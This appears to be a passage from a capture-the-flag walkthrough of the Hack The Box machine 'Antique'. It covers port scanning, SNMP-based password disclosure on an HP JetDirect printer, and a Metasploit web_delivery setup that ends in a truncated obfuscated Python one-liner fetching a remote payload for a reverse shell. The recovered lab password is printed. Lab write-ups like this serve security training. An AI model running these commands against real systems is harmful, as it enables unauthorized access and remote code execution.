Summary
Antique is Linux machine and is considered an easy box by the hack the box. On this box, we will begin with a basic port scan and move laterally based on the findings. Then we will enumerate telnet service and hunt vulnerabilities present in a particular version. Laterally, we will exploit password disclosure vulnerability and obtain plain taxed passwords. Then we will be tasked to gain root access where we will need to perform port forwarding then we will read sensitive files by exploiting the file read vulnerability present on CUPS 1.6.1 version. In addition, we will be exploiting privilege and port forwarding using two different techniques.
Table of content
Initial Access
- Initial Nmap TCP Port Scan
- Telnet Banner Grabbing
- Searching for the exploit
- SNMP Enumeration
- User Shell
- User Flag
Privilege Escalation
- Port Forwarding with Metasploit
- Finding Privilege Escalation Vectors
- Exploit File read Vulnerability
- Root Flag
- Manual Method
- Port forwarding with chisel
- Root flag
Let’s exploit it step by step.
Initial Access
We are going to start the assessment with the normal TCP/IP port scanning.
Initial Nmap TCP Port Scan
We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform a port scan, we have used the –sV flag with full TCP ports against the target system which will scan full TCP ports with service version.
Flags features:
-sV: Attempts to determine the service version
-p-: Attempts to scan full ports
nmap -p- -sV 10.129.33.36
From the nmap scan, we have found telnet is open. Telnet is used to make remote connections. Many of the telnet version are vulnerable and it is not a secured protocol because it does not follow any encryption while communicating and transferring any message from one endpoint to another.
Telnet Banner Grabbing
While banner grabbing, it has shown an HP JetDirect and prompt for the password. By its name, it looks like a printer service which is managed by telnet protocol. Many times, administrators use a common password for the printers but did not work in our case.
Searching for the exploit
When we searched for the exploit related to HP Jet Direct, we found one exploit available which has a vulnerability to disclosing the device password. We downloaded the exploit and checked the source code we found it works with SNMP protocol. If we get the device password, then we can enumerate the device via telnet using credentials. But it is only possible if the SNMP protocol is open.
searchsploit HP JetDirect
searchsploit -m 22319
cat 22319.txt
SNMP Enumeration
This time, we are scanning only SNMP Service which is works on its default port 161 and follows UDP protocol. From the nmap scan result, we found that SNMP port is open and community name is public which is very common. Also, we found it is using SNMP version 1 which is an insecure version as it does not follow encryption.
Flags features:
-sU: Attempts to scan UDP ports
-sV: Attempts to determine the service version
-p: Attempts to scan against given port
nmap -sU -sV -p 161 10.129.33.36
Next, we are following the exploit we found earlier which gave us some decimal values. Here we have given target IP address which is 10.129.33.36.
snmpget -v 1 -c public 10.129.33.36 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Then, we copied all decimal contents and decoded them using cyberchef. Cyberchef is an online tool used to encode and decode. After decoding we got a plain taxed password:
P@ssw0rd@123!!123
Reference link: https://gchq.github.io/CyberChef/
User Shell
With obtained credentials, we logged in to telnet and used the help command (?). There we saw , we can use exec command which means we can execute any system commands from here.
Then we used the Metasploit script web delivery module which will create a server and send the payload to receive the reverse shell once the server started, we will use a python reverse shell. Execution of the reverse shell will give us a meterpreter session. To do that we have to provide the srvhost IP address and local host IP address and listening port, but we can skip lport as Metasploit picks it by itself and its default listening port is 4444. Please note, both srvhost and local IP address are the same as our kali machine IP address. More information about this module is available here:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery/
use multi/script/web_delivery
set lhost 10.10.14.93
set srvhost 10.10.14.93
exploit
python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0
Source: HackingArticles
Source Link: https://www.hackingarticles.in/antique-hackthebox-walkthrough/